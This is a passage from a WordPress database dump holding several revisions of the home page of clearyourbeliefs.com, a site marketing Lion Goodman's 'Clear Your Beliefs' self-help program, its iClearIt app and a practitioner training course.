"right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p> <em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-04 18:30:20', '2014-11-04 23:30:20', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1650, 2, '2014-11-04 18:32:36', '2014-11-04 23:32:36', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2 style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" data-wp-imgselect="1" />A Note from Lion Goodman</strong></h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.  </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p> <em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-04 18:32:36', '2014-11-04 23:32:36', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1653, 2, '2014-11-06 17:34:53', '2014-11-06 22:34:53', '', 'IClearIt-website', '', 'inherit', 'closed', 'open', '', 'iclearit-website', '', '', '2014-11-06 17:34:53', '2014-11-06 22:34:53', '', 1450, 'http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png', 0, 'attachment', 'image/png', 0),
(1655, 2, '2014-11-06 17:37:18', '2014-11-06 22:37:18', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\nComplete Program\n<img style="margin-top: -2px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png">\n<p style="text-align: center;margin-top: 37px;font-size: 18px"> <strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center;margin-top: 37px">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center;margin-bottom: -5px;margin-top: 30px"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</strong><strong>Creator of the <em>Clear Your Beliefs</em> program. </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p> <em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-06 17:37:18', '2014-11-06 22:37:18', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1654, 2, '2014-11-06 17:35:37', '2014-11-06 22:35:37', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\nComplete Program\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website-150x150.png" alt="IClearIt-website" width="150" height="150" class="aligncenter size-thumbnail wp-image-1653" /></a>\n<p style="text-align: center;margin-top: 37px;font-size: 18px"> <strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center;margin-top: 37px">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center;margin-bottom: -5px;margin-top: 30px"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</strong><strong>Creator of the <em>Clear Your Beliefs</em> program. </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p> <em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-06 17:35:37', '2014-11-06 22:35:37', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1657, 2, '2014-11-06 17:51:15', '2014-11-06 22:51:15', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\nComplete Program\n<img style="margin-top: -2px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"><p style="text-align: center;margin-top: 17px;font-size: 18px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p><p style="text-align: center;margin-top: 17px">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</strong><strong>Creator of the <em>Clear Your Beliefs</em> program. </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p> <em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-06 17:51:15', '2014-11-06 22:51:15', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1658, 2, '2014-11-06 17:51:55', '2014-11-06 22:51:55', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\nComplete Program\n<img style="margin-top: -2px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png">\n<p style="text-align: center;margin-top: 15px;font-size: 18px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center;margin-top: 15px">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &amp;\nLimit Your True Magnificence\n\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</strong><strong>Creator of the <em>Clear Your Beliefs</em> program. </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p> <em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" 